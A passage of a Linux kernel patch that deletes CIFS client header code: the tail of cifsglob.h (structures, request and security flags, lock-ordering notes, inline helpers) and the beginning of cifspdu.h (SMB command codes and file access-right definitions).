+-	__le16 Pid;
+-	__le16 PidHigh;
+-	__u16 Mid;
+-	__u16 Tid;
+-	__u16 Uid;
+-	__u16 netfid;
+-	__u32 filter; /* CompletionFilter (for multishot) */
+-	int multishot;
+-	struct file *pfile;
+-};
+-
+-struct dfs_info3_param {
+-	int flags; /* DFSREF_REFERRAL_SERVER, DFSREF_STORAGE_SERVER*/
+-	int path_consumed;
+-	int server_type;
+-	int ref_flag;
+-	char *path_name;
+-	char *node_name;
+-	int ttl;
+-};
+-
+-struct file_list {
+-	struct list_head list;
+-	struct cifsFileInfo *cfile;
+-};
+-
+-static inline void free_dfs_info_param(struct dfs_info3_param *param)
+-{
+-	if (param) {
+-		kfree(param->path_name);
+-		kfree(param->node_name);
+-	}
+-}
+-
+-static inline void free_dfs_info_array(struct dfs_info3_param *param,
+-				       int number_of_items)
+-{
+-	int i;
+-	if ((number_of_items == 0) || (param == NULL))
+-		return;
+-	for (i = 0; i < number_of_items; i++) {
+-		kfree(param[i].path_name);
+-		kfree(param[i].node_name);
+-	}
+-	kfree(param);
+-}
+-
+-static inline bool is_interrupt_error(int error)
+-{
+-	switch (error) {
+-	case -EINTR:
+-	case -ERESTARTSYS:
+-	case -ERESTARTNOHAND:
+-	case -ERESTARTNOINTR:
+-		return true;
+-	}
+-	return false;
+-}
+-
+-static inline bool is_retryable_error(int error)
+-{
+-	if (is_interrupt_error(error) || error == -EAGAIN)
+-		return true;
+-	return false;
+-}
+-
+-
+-/* cifs_get_writable_file() flags */
+-#define FIND_WR_ANY         0
+-#define FIND_WR_FSUID_ONLY  1
+-#define FIND_WR_WITH_DELETE 2
+-
+-#define   MID_FREE 0
+-#define   MID_REQUEST_ALLOCATED 1
+-#define   MID_REQUEST_SUBMITTED 2
+-#define   MID_RESPONSE_RECEIVED 4
+-#define   MID_RETRY_NEEDED      8 /* session closed while this request out */
+-#define   MID_RESPONSE_MALFORMED 0x10
+-#define   MID_SHUTDOWN		 0x20
+-
+-/* Flags */
+-#define   MID_WAIT_CANCELLED	 1 /* Cancelled while waiting for response */
+-#define   MID_DELETED            2 /* Mid has been dequeued/deleted */
+-
+-/* Types of response buffer returned from SendReceive2 */
+-#define   CIFS_NO_BUFFER        0    /* Response buffer not returned */
+-#define   CIFS_SMALL_BUFFER     1
+-#define   CIFS_LARGE_BUFFER     2
+-#define   CIFS_IOVEC            4    /* array of response buffers */
+-
+-/* Type of Request to SendReceive2 */
+-#define   CIFS_BLOCKING_OP      1    /* operation can block */
+-#define   CIFS_NON_BLOCKING     2    /* do not block waiting for credits */
+-#define   CIFS_TIMEOUT_MASK 0x003    /* only one of above set in req */
+-#define   CIFS_LOG_ERROR    0x010    /* log NT STATUS if non-zero */
+-#define   CIFS_LARGE_BUF_OP 0x020    /* large request buffer */
+-#define   CIFS_NO_RSP_BUF   0x040    /* no response buffer required */
+-
+-/* Type of request operation */
+-#define   CIFS_ECHO_OP            0x080  /* echo request */
+-#define   CIFS_OBREAK_OP          0x0100 /* oplock break request */
+-#define   CIFS_NEG_OP             0x0200 /* negotiate request */
+-#define   CIFS_CP_CREATE_CLOSE_OP 0x0400 /* compound create+close request */
+-/* Lower bitmask values are reserved by others below. */
+-#define   CIFS_SESS_OP            0x2000 /* session setup request */
+-#define   CIFS_OP_MASK            0x2780 /* mask request type */
+-
+-#define   CIFS_HAS_CREDITS        0x0400 /* already has credits */
+-#define   CIFS_TRANSFORM_REQ      0x0800 /* transform request before sending */
+-#define   CIFS_NO_SRV_RSP         0x1000 /* there is no server response */
+-
+-/* Security Flags: indicate type of session setup needed */
+-#define   CIFSSEC_MAY_SIGN	0x00001
+-#define   CIFSSEC_MAY_NTLMV2	0x00004
+-#define   CIFSSEC_MAY_KRB5	0x00008
+-#define   CIFSSEC_MAY_SEAL	0x00040 /* not supported yet */
+-#define   CIFSSEC_MAY_NTLMSSP	0x00080 /* raw ntlmssp with ntlmv2 */
+-
+-#define   CIFSSEC_MUST_SIGN	0x01001
+-/* note that only one of the following can be set so the
+-result of setting MUST flags more than once will be to
+-require use of the stronger protocol */
+-#define   CIFSSEC_MUST_NTLMV2	0x04004
+-#define   CIFSSEC_MUST_KRB5	0x08008
+-#ifdef CONFIG_CIFS_UPCALL
+-#define   CIFSSEC_MASK          0x8F08F /* flags supported if no weak allowed */
+-#else
+-#define	  CIFSSEC_MASK          0x87087 /* flags supported if no weak allowed */
+-#endif /* UPCALL */
+-#define   CIFSSEC_MUST_SEAL	0x40040 /* not supported yet */
+-#define   CIFSSEC_MUST_NTLMSSP	0x80080 /* raw ntlmssp with ntlmv2 */
+-
+-#define   CIFSSEC_DEF (CIFSSEC_MAY_SIGN | CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_NTLMSSP)
+-#define   CIFSSEC_MAX (CIFSSEC_MUST_NTLMV2)
+-#define   CIFSSEC_AUTH_MASK (CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_KRB5 | CIFSSEC_MAY_NTLMSSP)
+-/*
+- *****************************************************************
+- * All constants go here
+- *****************************************************************
+- */
+-
+-#define UID_HASH (16)
+-
+-/*
+- * Note that ONE module should define _DECLARE_GLOBALS_HERE to cause the
+- * following to be declared.
+- */
+-
+-/****************************************************************************
+- * Here are all the locks (spinlock, mutex, semaphore) in cifs.ko, arranged according
+- * to the locking order. i.e. if two locks are to be held together, the lock that
+- * appears higher in this list needs to be taken before the other.
+- *
+- * If you hold a lock that is lower in this list, and you need to take a higher lock
+- * (or if you think that one of the functions that you're calling may need to), first
+- * drop the lock you hold, pick up the higher lock, then the lower one. This will
+- * ensure that locks are picked up only in one direction in the below table
+- * (top to bottom).
+- *
+- * Also, if you expect a function to be called with a lock held, explicitly document
+- * this in the comments on top of your function definition.
+- *
+- * And also, try to keep the critical sections (lock hold time) to be as minimal as
+- * possible. Blocking / calling other functions with a lock held always increase
+- * the risk of a possible deadlock.
+- *
+- * Following this rule will avoid unnecessary deadlocks, which can get really hard to
+- * debug. Also, any new lock that you introduce, please add to this list in the correct
+- * order.
+- *
+- * Please populate this list whenever you introduce new locks in your changes. Or in
+- * case I've missed some existing locks. Please ensure that it's added in the list
+- * based on the locking order expected.
+- *
+- * =====================================================================================
+- * Lock				Protects			Initialization fn
+- * =====================================================================================
+- * vol_list_lock
+- * vol_info->ctx_lock		vol_info->ctx
+- * cifs_sb_info->tlink_tree_lock	cifs_sb_info->tlink_tree	cifs_setup_cifs_sb
+- * TCP_Server_Info->		TCP_Server_Info			cifs_get_tcp_session
+- * reconnect_mutex
+- * TCP_Server_Info->srv_mutex	TCP_Server_Info			cifs_get_tcp_session
+- * cifs_ses->session_mutex		cifs_ses		sesInfoAlloc
+- *				cifs_tcon
+- * cifs_tcon->open_file_lock	cifs_tcon->openFileList		tconInfoAlloc
+- *				cifs_tcon->pending_opens
+- * cifs_tcon->stat_lock		cifs_tcon->bytes_read		tconInfoAlloc
+- *				cifs_tcon->bytes_written
+- * cifs_tcp_ses_lock		cifs_tcp_ses_list		sesInfoAlloc
+- * GlobalMid_Lock		GlobalMaxActiveXid		init_cifs
+- *				GlobalCurrentXid
+- *				GlobalTotalActiveXid
+- * TCP_Server_Info->srv_lock	(anything in struct not protected by another lock and can change)
+- * TCP_Server_Info->mid_lock	TCP_Server_Info->pending_mid_q	cifs_get_tcp_session
+- *				->CurrentMid
+- *				(any changes in mid_q_entry fields)
+- * TCP_Server_Info->req_lock	TCP_Server_Info->in_flight	cifs_get_tcp_session
+- *				->credits
+- *				->echo_credits
+- *				->oplock_credits
+- *				->reconnect_instance
+- * cifs_ses->ses_lock		(anything that is not protected by another lock and can change)
+- * cifs_ses->iface_lock		cifs_ses->iface_list		sesInfoAlloc
+- *				->iface_count
+- *				->iface_last_update
+- * cifs_ses->chan_lock		cifs_ses->chans
+- *				->chans_need_reconnect
+- *				->chans_in_reconnect
+- * cifs_tcon->tc_lock		(anything that is not protected by another lock and can change)
+- * cifsInodeInfo->open_file_lock	cifsInodeInfo->openFileList	cifs_alloc_inode
+- * cifsInodeInfo->writers_lock	cifsInodeInfo->writers		cifsInodeInfo_alloc
+- * cifsInodeInfo->lock_sem	cifsInodeInfo->llist		cifs_init_once
+- *				->can_cache_brlcks
+- * cifsInodeInfo->deferred_lock	cifsInodeInfo->deferred_closes	cifsInodeInfo_alloc
+- * cached_fid->fid_mutex		cifs_tcon->crfid		tconInfoAlloc
+- * cifsFileInfo->fh_mutex		cifsFileInfo			cifs_new_fileinfo
+- * cifsFileInfo->file_info_lock	cifsFileInfo->count		cifs_new_fileinfo
+- *				->invalidHandle			initiate_cifs_search
+- *				->oplock_break_cancelled
+- * cifs_aio_ctx->aio_mutex		cifs_aio_ctx			cifs_aio_ctx_alloc
+- ****************************************************************************/
+-
+-#ifdef DECLARE_GLOBALS_HERE
+-#define GLOBAL_EXTERN
+-#else
+-#define GLOBAL_EXTERN extern
+-#endif
+-
+-/*
+- * the list of TCP_Server_Info structures, ie each of the sockets
+- * connecting our client to a distinct server (ip address), is
+- * chained together by cifs_tcp_ses_list. The list of all our SMB
+- * sessions (and from that the tree connections) can be found
+- * by iterating over cifs_tcp_ses_list
+- */
+-extern struct list_head		cifs_tcp_ses_list;
+-
+-/*
+- * This lock protects the cifs_tcp_ses_list, the list of smb sessions per
+- * tcp session, and the list of tcon's per smb session. It also protects
+- * the reference counters for the server, smb session, and tcon.
+- * generally the locks should be taken in order tcp_ses_lock before
+- * tcon->open_file_lock and that before file->file_info_lock since the
+- * structure order is cifs_socket-->cifs_ses-->cifs_tcon-->cifs_file
+- */
+-extern spinlock_t		cifs_tcp_ses_lock;
+-
+-/*
+- * Global transaction id (XID) information
+- */
+-extern unsigned int GlobalCurrentXid;	/* protected by GlobalMid_Sem */
+-extern unsigned int GlobalTotalActiveXid; /* prot by GlobalMid_Sem */
+-extern unsigned int GlobalMaxActiveXid;	/* prot by GlobalMid_Sem */
+-extern spinlock_t GlobalMid_Lock; /* protects above & list operations on midQ entries */
+-
+-/*
+- *  Global counters, updated atomically
+- */
+-extern atomic_t sesInfoAllocCount;
+-extern atomic_t tconInfoAllocCount;
+-extern atomic_t tcpSesNextId;
+-extern atomic_t tcpSesAllocCount;
+-extern atomic_t tcpSesReconnectCount;
+-extern atomic_t tconInfoReconnectCount;
+-
+-/* Various Debug counters */
+-extern atomic_t buf_alloc_count;	/* current number allocated  */
+-extern atomic_t small_buf_alloc_count;
+-#ifdef CONFIG_CIFS_STATS2
+-extern atomic_t total_buf_alloc_count; /* total allocated over all time */
+-extern atomic_t total_small_buf_alloc_count;
+-extern unsigned int slow_rsp_threshold; /* number of secs before logging */
+-#endif
+-
+-/* Misc globals */
+-extern bool enable_oplocks; /* enable or disable oplocks */
+-extern bool lookupCacheEnabled;
+-extern unsigned int global_secflags;	/* if on, session setup sent
+-				with more secure ntlmssp2 challenge/resp */
+-extern unsigned int sign_CIFS_PDUs;  /* enable smb packet signing */
+-extern bool enable_gcm_256; /* allow optional negotiate of strongest signing (aes-gcm-256) */
+-extern bool require_gcm_256; /* require use of strongest signing (aes-gcm-256) */
+-extern bool enable_negotiate_signing; /* request use of faster (GMAC) signing if available */
+-extern bool linuxExtEnabled;/*enable Linux/Unix CIFS extensions*/
+-extern unsigned int CIFSMaxBufSize;  /* max size not including hdr */
+-extern unsigned int cifs_min_rcv;    /* min size of big ntwrk buf pool */
+-extern unsigned int cifs_min_small;  /* min size of small buf pool */
+-extern unsigned int cifs_max_pending; /* MAX requests at once to server*/
+-extern bool disable_legacy_dialects;  /* forbid vers=1.0 and vers=2.0 mounts */
+-extern atomic_t mid_count;
+-
+-void cifs_oplock_break(struct work_struct *work);
+-void cifs_queue_oplock_break(struct cifsFileInfo *cfile);
+-void smb2_deferred_work_close(struct work_struct *work);
+-
+-extern const struct slow_work_ops cifs_oplock_break_ops;
+-extern struct workqueue_struct *cifsiod_wq;
+-extern struct workqueue_struct *decrypt_wq;
+-extern struct workqueue_struct *fileinfo_put_wq;
+-extern struct workqueue_struct *cifsoplockd_wq;
+-extern struct workqueue_struct *deferredclose_wq;
+-extern __u32 cifs_lock_secret;
+-
+-extern mempool_t *cifs_mid_poolp;
+-
+-/* Operations for different SMB versions */
+-#define SMB1_VERSION_STRING	"1.0"
+-#define SMB20_VERSION_STRING    "2.0"
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-extern struct smb_version_operations smb1_operations;
+-extern struct smb_version_values smb1_values;
+-extern struct smb_version_operations smb20_operations;
+-extern struct smb_version_values smb20_values;
+-#endif /* CIFS_ALLOW_INSECURE_LEGACY */
+-#define SMB21_VERSION_STRING	"2.1"
+-extern struct smb_version_operations smb21_operations;
+-extern struct smb_version_values smb21_values;
+-#define SMBDEFAULT_VERSION_STRING "default"
+-extern struct smb_version_values smbdefault_values;
+-#define SMB3ANY_VERSION_STRING "3"
+-extern struct smb_version_values smb3any_values;
+-#define SMB30_VERSION_STRING	"3.0"
+-extern struct smb_version_operations smb30_operations;
+-extern struct smb_version_values smb30_values;
+-#define SMB302_VERSION_STRING	"3.02"
+-#define ALT_SMB302_VERSION_STRING "3.0.2"
+-/*extern struct smb_version_operations smb302_operations;*/ /* not needed yet */
+-extern struct smb_version_values smb302_values;
+-#define SMB311_VERSION_STRING	"3.1.1"
+-#define ALT_SMB311_VERSION_STRING "3.11"
+-extern struct smb_version_operations smb311_operations;
+-extern struct smb_version_values smb311_values;
+-
+-static inline char *get_security_type_str(enum securityEnum sectype)
+-{
+-	switch (sectype) {
+-	case RawNTLMSSP:
+-		return "RawNTLMSSP";
+-	case Kerberos:
+-		return "Kerberos";
+-	case NTLMv2:
+-		return "NTLMv2";
+-	default:
+-		return "Unknown";
+-	}
+-}
+-
+-static inline bool is_smb1_server(struct TCP_Server_Info *server)
+-{
+-	return strcmp(server->vals->version_string, SMB1_VERSION_STRING) == 0;
+-}
+-
+-static inline bool is_tcon_dfs(struct cifs_tcon *tcon)
+-{
+-	/*
+-	 * For SMB1, see MS-CIFS 2.4.55 SMB_COM_TREE_CONNECT_ANDX (0x75) and MS-CIFS 3.3.4.4 DFS
+-	 * Subsystem Notifies That a Share Is a DFS Share.
+-	 *
+-	 * For SMB2+, see MS-SMB2 2.2.10 SMB2 TREE_CONNECT Response and MS-SMB2 3.3.4.14 Server
+-	 * Application Updates a Share.
+-	 */
+-	if (!tcon || !tcon->ses || !tcon->ses->server)
+-		return false;
+-	return is_smb1_server(tcon->ses->server) ? tcon->Flags & SMB_SHARE_IS_IN_DFS :
+-		tcon->share_flags & (SHI1005_FLAGS_DFS | SHI1005_FLAGS_DFS_ROOT);
+-}
+-
+-static inline bool cifs_is_referral_server(struct cifs_tcon *tcon,
+-					   const struct dfs_info3_param *ref)
+-{
+-	/*
+-	 * Check if all targets are capable of handling DFS referrals as per
+-	 * MS-DFSC 2.2.4 RESP_GET_DFS_REFERRAL.
+-	 */
+-	return is_tcon_dfs(tcon) || (ref && (ref->flags & DFSREF_REFERRAL_SERVER));
+-}
+-
+-static inline u64 cifs_flock_len(const struct file_lock *fl)
+-{
+-	return (u64)fl->fl_end - fl->fl_start + 1;
+-}
+-
+-static inline size_t ntlmssp_workstation_name_size(const struct cifs_ses *ses)
+-{
+-	if (WARN_ON_ONCE(!ses || !ses->server))
+-		return 0;
+-	/*
+-	 * Make workstation name no more than 15 chars when using insecure dialects as some legacy
+-	 * servers do require it during NTLMSSP.
+-	 */
+-	if (ses->server->dialect <= SMB20_PROT_ID)
+-		return min_t(size_t, sizeof(ses->workstation_name), RFC1001_NAME_LEN_WITH_NULL);
+-	return sizeof(ses->workstation_name);
+-}
+-
+-static inline void move_cifs_info_to_smb2(struct smb2_file_all_info *dst, const FILE_ALL_INFO *src)
+-{
+-	memcpy(dst, src, (size_t)((u8 *)&src->AccessFlags - (u8 *)src));
+-	dst->AccessFlags = src->AccessFlags;
+-	dst->CurrentByteOffset = src->CurrentByteOffset;
+-	dst->Mode = src->Mode;
+-	dst->AlignmentRequirement = src->AlignmentRequirement;
+-	dst->FileNameLength = src->FileNameLength;
+-}
+-
+-static inline unsigned int cifs_get_num_sgs(const struct smb_rqst *rqst,
+-					    int num_rqst,
+-					    const u8 *sig)
+-{
+-	unsigned int len, skip;
+-	unsigned int nents = 0;
+-	unsigned long addr;
+-	int i, j;
+-
+-	/* Assumes the first rqst has a transform header as the first iov.
+-	 * I.e.
+-	 * rqst[0].rq_iov[0]  is transform header
+-	 * rqst[0].rq_iov[1+] data to be encrypted/decrypted
+-	 * rqst[1+].rq_iov[0+] data to be encrypted/decrypted
+-	 */
+-	for (i = 0; i < num_rqst; i++) {
+-		/*
+-		 * The first rqst has a transform header where the
+-		 * first 20 bytes are not part of the encrypted blob.
+-		 */
+-		for (j = 0; j < rqst[i].rq_nvec; j++) {
+-			struct kvec *iov = &rqst[i].rq_iov[j];
+-
+-			skip = (i == 0) && (j == 0) ? 20 : 0;
+-			addr = (unsigned long)iov->iov_base + skip;
+-			if (unlikely(is_vmalloc_addr((void *)addr))) {
+-				len = iov->iov_len - skip;
+-				nents += DIV_ROUND_UP(offset_in_page(addr) + len,
+-						      PAGE_SIZE);
+-			} else {
+-				nents++;
+-			}
+-		}
+-		nents += rqst[i].rq_npages;
+-	}
+-	nents += DIV_ROUND_UP(offset_in_page(sig) + SMB2_SIGNATURE_SIZE, PAGE_SIZE);
+-	return nents;
+-}
+-
+-/* We can not use the normal sg_set_buf() as we will sometimes pass a
+- * stack object as buf.
+- */
+-static inline struct scatterlist *cifs_sg_set_buf(struct scatterlist *sg,
+-						  const void *buf,
+-						  unsigned int buflen)
+-{
+-	unsigned long addr = (unsigned long)buf;
+-	unsigned int off = offset_in_page(addr);
+-
+-	addr &= PAGE_MASK;
+-	if (unlikely(is_vmalloc_addr((void *)addr))) {
+-		do {
+-			unsigned int len = min_t(unsigned int, buflen, PAGE_SIZE - off);
+-
+-			sg_set_page(sg++, vmalloc_to_page((void *)addr), len, off);
+-
+-			off = 0;
+-			addr += PAGE_SIZE;
+-			buflen -= len;
+-		} while (buflen);
+-	} else {
+-		sg_set_page(sg++, virt_to_page(addr), buflen, off);
+-	}
+-	return sg;
+-}
+-
+-#endif	/* _CIFS_GLOB_H */
+diff --git a/fs/cifs/cifspdu.h b/fs/cifs/cifspdu.h
+deleted file mode 100644
+index d1abaeea974a9..0000000000000
+--- a/fs/cifs/cifspdu.h
++++ /dev/null
+@@ -1,2730 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2009
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#ifndef _CIFSPDU_H
+-#define _CIFSPDU_H
+-
+-#include <net/sock.h>
+-#include <asm/unaligned.h>
+-#include "../smbfs_common/smbfsctl.h"
+-
+-#define CIFS_PROT   0
+-#define POSIX_PROT  (CIFS_PROT+1)
+-#define BAD_PROT 0xFFFF
+-
+-/* SMB command codes:
+- * Note some commands have minimal (wct=0,bcc=0), or uninteresting, responses
+- * (ie which include no useful data other than the SMB error code itself).
+- * This can allow us to avoid response buffer allocations and copy in some cases
+- */
+-#define SMB_COM_CREATE_DIRECTORY      0x00 /* trivial response */
+-#define SMB_COM_DELETE_DIRECTORY      0x01 /* trivial response */
+-#define SMB_COM_CLOSE                 0x04 /* triv req/rsp, timestamp ignored */
+-#define SMB_COM_FLUSH                 0x05 /* triv req/rsp */
+-#define SMB_COM_DELETE                0x06 /* trivial response */
+-#define SMB_COM_RENAME                0x07 /* trivial response */
+-#define SMB_COM_QUERY_INFORMATION     0x08 /* aka getattr */
+-#define SMB_COM_SETATTR               0x09 /* trivial response */
+-#define SMB_COM_LOCKING_ANDX          0x24 /* trivial response */
+-#define SMB_COM_COPY                  0x29 /* trivial rsp, fail filename ignrd*/
+-#define SMB_COM_ECHO                  0x2B /* echo request */
+-#define SMB_COM_OPEN_ANDX             0x2D /* Legacy open for old servers */
+-#define SMB_COM_READ_ANDX             0x2E
+-#define SMB_COM_WRITE_ANDX            0x2F
+-#define SMB_COM_TRANSACTION2          0x32
+-#define SMB_COM_TRANSACTION2_SECONDARY 0x33
+-#define SMB_COM_FIND_CLOSE2           0x34 /* trivial response */
+-#define SMB_COM_TREE_DISCONNECT       0x71 /* trivial response */
+-#define SMB_COM_NEGOTIATE             0x72
+-#define SMB_COM_SESSION_SETUP_ANDX    0x73
+-#define SMB_COM_LOGOFF_ANDX           0x74 /* trivial response */
+-#define SMB_COM_TREE_CONNECT_ANDX     0x75
+-#define SMB_COM_NT_TRANSACT           0xA0
+-#define SMB_COM_NT_TRANSACT_SECONDARY 0xA1
+-#define SMB_COM_NT_CREATE_ANDX        0xA2
+-#define SMB_COM_NT_CANCEL             0xA4 /* no response */
+-#define SMB_COM_NT_RENAME             0xA5 /* trivial response */
+-
+-/* Transact2 subcommand codes */
+-#define TRANS2_OPEN                   0x00
+-#define TRANS2_FIND_FIRST             0x01
+-#define TRANS2_FIND_NEXT              0x02
+-#define TRANS2_QUERY_FS_INFORMATION   0x03
+-#define TRANS2_SET_FS_INFORMATION     0x04
+-#define TRANS2_QUERY_PATH_INFORMATION 0x05
+-#define TRANS2_SET_PATH_INFORMATION   0x06
+-#define TRANS2_QUERY_FILE_INFORMATION 0x07
+-#define TRANS2_SET_FILE_INFORMATION   0x08
+-#define TRANS2_GET_DFS_REFERRAL       0x10
+-#define TRANS2_REPORT_DFS_INCOSISTENCY 0x11
+-
+-/* SMB Transact (Named Pipe) subcommand codes */
+-#define TRANS_SET_NMPIPE_STATE      0x0001
+-#define TRANS_RAW_READ_NMPIPE       0x0011
+-#define TRANS_QUERY_NMPIPE_STATE    0x0021
+-#define TRANS_QUERY_NMPIPE_INFO     0x0022
+-#define TRANS_PEEK_NMPIPE           0x0023
+-#define TRANS_TRANSACT_NMPIPE       0x0026
+-#define TRANS_RAW_WRITE_NMPIPE      0x0031
+-#define TRANS_READ_NMPIPE           0x0036
+-#define TRANS_WRITE_NMPIPE          0x0037
+-#define TRANS_WAIT_NMPIPE           0x0053
+-#define TRANS_CALL_NMPIPE           0x0054
+-
+-/* NT Transact subcommand codes */
+-#define NT_TRANSACT_CREATE            0x01
+-#define NT_TRANSACT_IOCTL             0x02
+-#define NT_TRANSACT_SET_SECURITY_DESC 0x03
+-#define NT_TRANSACT_NOTIFY_CHANGE     0x04
+-#define NT_TRANSACT_RENAME            0x05
+-#define NT_TRANSACT_QUERY_SECURITY_DESC 0x06
+-#define NT_TRANSACT_GET_USER_QUOTA    0x07
+-#define NT_TRANSACT_SET_USER_QUOTA    0x08
+-
+-#define MAX_CIFS_SMALL_BUFFER_SIZE 448 /* big enough for most */
+-/* future chained NTCreateXReadX bigger, but for time being NTCreateX biggest */
+-/* among the requests (NTCreateX response is bigger with wct of 34) */
+-#define MAX_CIFS_HDR_SIZE 0x58 /* 4 len + 32 hdr + (2*24 wct) + 2 bct + 2 pad */
+-#define CIFS_SMALL_PATH 120 /* allows for (448-88)/3 */
+-
+-/* internal cifs vfs structures */
+-/*****************************************************************
+- * All constants go here
+- *****************************************************************
+- */
+-
+-/*
+- * Starting value for maximum SMB size negotiation
+- */
+-#define CIFS_MAX_MSGSIZE (4*4096)
+-
+-/*
+- * Size of encrypted user password in bytes
+- */
+-#define CIFS_ENCPWD_SIZE (16)
+-
+-/*
+- * Size of the crypto key returned on the negotiate SMB in bytes
+- */
+-#define CIFS_CRYPTO_KEY_SIZE (8)
+-
+-/*
+- * Size of the ntlm client response
+- */
+-#define CIFS_AUTH_RESP_SIZE (24)
+-
+-/*
+- * Size of the session key (crypto key encrypted with the password
+- */
+-#define CIFS_SESS_KEY_SIZE (16)
+-
+-#define CIFS_SERVER_CHALLENGE_SIZE (8)
+-#define CIFS_HMAC_MD5_HASH_SIZE (16)
+-#define CIFS_CPHTXT_SIZE (16)
+-#define CIFS_NTHASH_SIZE (16)
+-
+-/*
+- * Maximum user name length
+- */
+-#define CIFS_UNLEN (20)
+-
+-/*
+- * Flags on SMB open
+- */
+-#define SMBOPEN_WRITE_THROUGH 0x4000
+-#define SMBOPEN_DENY_ALL      0x0010
+-#define SMBOPEN_DENY_WRITE    0x0020
+-#define SMBOPEN_DENY_READ     0x0030
+-#define SMBOPEN_DENY_NONE     0x0040
+-#define SMBOPEN_READ          0x0000
+-#define SMBOPEN_WRITE         0x0001
+-#define SMBOPEN_READWRITE     0x0002
+-#define SMBOPEN_EXECUTE       0x0003
+-
+-#define SMBOPEN_OCREATE       0x0010
+-#define SMBOPEN_OTRUNC        0x0002
+-#define SMBOPEN_OAPPEND       0x0001
+-
+-/*
+- * SMB flag definitions
+- */
+-#define SMBFLG_EXTD_LOCK 0x01	/* server supports lock-read write-unlock smb */
+-#define SMBFLG_RCV_POSTED 0x02	/* obsolete */
+-#define SMBFLG_RSVD 0x04
+-#define SMBFLG_CASELESS 0x08	/* all pathnames treated as caseless (off
+-				implies case sensitive file handling request) */
+-#define SMBFLG_CANONICAL_PATH_FORMAT 0x10	/* obsolete */
+-#define SMBFLG_OLD_OPLOCK 0x20	/* obsolete */
+-#define SMBFLG_OLD_OPLOCK_NOTIFY 0x40	/* obsolete */
+-#define SMBFLG_RESPONSE 0x80	/* this PDU is a response from server */
+-
+-/*
+- * SMB flag2 definitions
+- */
+-#define SMBFLG2_KNOWS_LONG_NAMES cpu_to_le16(1)	/* can send long (non-8.3)
+-						   path names in response */
+-#define SMBFLG2_KNOWS_EAS cpu_to_le16(2)
+-#define SMBFLG2_SECURITY_SIGNATURE cpu_to_le16(4)
+-#define SMBFLG2_COMPRESSED (8)
+-#define SMBFLG2_SECURITY_SIGNATURE_REQUIRED (0x10)
+-#define SMBFLG2_IS_LONG_NAME cpu_to_le16(0x40)
+-#define SMBFLG2_REPARSE_PATH (0x400)
+-#define SMBFLG2_EXT_SEC cpu_to_le16(0x800)
+-#define SMBFLG2_DFS cpu_to_le16(0x1000)
+-#define SMBFLG2_PAGING_IO cpu_to_le16(0x2000)
+-#define SMBFLG2_ERR_STATUS cpu_to_le16(0x4000)
+-#define SMBFLG2_UNICODE cpu_to_le16(0x8000)
+-
+-/*
+- * These are the file access permission bits defined in CIFS for the
+- * NTCreateAndX as well as the level 0x107
+- * TRANS2_QUERY_PATH_INFORMATION API.  The level 0x107, SMB_QUERY_FILE_ALL_INFO
+- * responds with the AccessFlags.
+- * The AccessFlags specifies the access permissions a caller has to the
+- * file and can have any suitable combination of the following values:
+- */
+-
+-#define FILE_READ_DATA        0x00000001  /* Data can be read from the file   */
+-#define FILE_WRITE_DATA       0x00000002  /* Data can be written to the file  */
+-#define FILE_APPEND_DATA      0x00000004  /* Data can be appended to the file */
+-#define FILE_READ_EA          0x00000008  /* Extended attributes associated   */
+-					  /* with the file can be read        */
+-#define FILE_WRITE_EA         0x00000010  /* Extended attributes associated   */
+-					  /* with the file can be written     */
+-#define FILE_EXECUTE          0x00000020  /*Data can be read into memory from */
+-					  /* the file using system paging I/O */
+-#define FILE_DELETE_CHILD     0x00000040
+-#define FILE_READ_ATTRIBUTES  0x00000080  /* Attributes associated with the   */
+-					  /* file can be read                 */
+-#define FILE_WRITE_ATTRIBUTES 0x00000100  /* Attributes associated with the   */
+-					  /* file can be written              */
+-#define DELETE                0x00010000  /* The file can be deleted          */
+-#define READ_CONTROL          0x00020000  /* The access control list and      */
+-					  /* ownership associated with the    */
+-					  /* file can be read                 */
+-#define WRITE_DAC             0x00040000  /* The access control list and      */
+-					  /* ownership associated with the    */
+-					  /* file can be written.             */
+-#define WRITE_OWNER           0x00080000  /* Ownership information associated */
+-					  /* with the file can be written     */
+-#define SYNCHRONIZE           0x00100000  /* The file handle can waited on to */
+-					  /* synchronize with the completion  */
+-					  /* of an input/output request       */
+-#define SYSTEM_SECURITY       0x01000000  /* The system access control list   */
+-					  /* can be read and changed          */
+-#define GENERIC_ALL           0x10000000
+-#define GENERIC_EXECUTE       0x20000000
+-#define GENERIC_WRITE         0x40000000
+-#define GENERIC_READ          0x80000000
+-					 /* In summary - Relevant file       */
+-					 /* access flags from CIFS are       */
+-					 /* file_read_data, file_write_data  */
+-					 /* file_execute, file_read_attributes*/
+-					 /* write_dac, and delete.           */
+-
+-#define FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA | FILE_READ_ATTRIBUTES)
+-#define FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
+-				| FILE_WRITE_EA | FILE_WRITE_ATTRIBUTES)
+-#define FILE_EXEC_RIGHTS (FILE_EXECUTE)
+-
+-#define SET_FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA | FILE_WRITE_EA \
+-				| FILE_READ_ATTRIBUTES \
+-				| FILE_WRITE_ATTRIBUTES \
+-				| DELETE | READ_CONTROL | WRITE_DAC \
+-				| WRITE_OWNER | SYNCHRONIZE)
+-#define SET_FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
+-				| FILE_READ_EA | FILE_WRITE_EA \
+-				| FILE_READ_ATTRIBUTES \
+-				| FILE_WRITE_ATTRIBUTES \
+-				| DELETE | READ_CONTROL | WRITE_DAC \
+-				| WRITE_OWNER | SYNCHRONIZE)
+-#define SET_FILE_EXEC_RIGHTS (FILE_READ_EA | FILE_WRITE_EA | FILE_EXECUTE \
+-				| FILE_READ_ATTRIBUTES \
+-				| FILE_WRITE_ATTRIBUTES \
+-				| DELETE | READ_CONTROL | WRITE_DAC \
+-				| WRITE_OWNER | SYNCHRONIZE)
+-
+-#define SET_MINIMUM_RIGHTS (FILE_READ_EA | FILE_READ_ATTRIBUTES \
+-				| READ_CONTROL | SYNCHRONIZE)
+-
+-
+-/*
+- * Invalid readdir handle
+- */
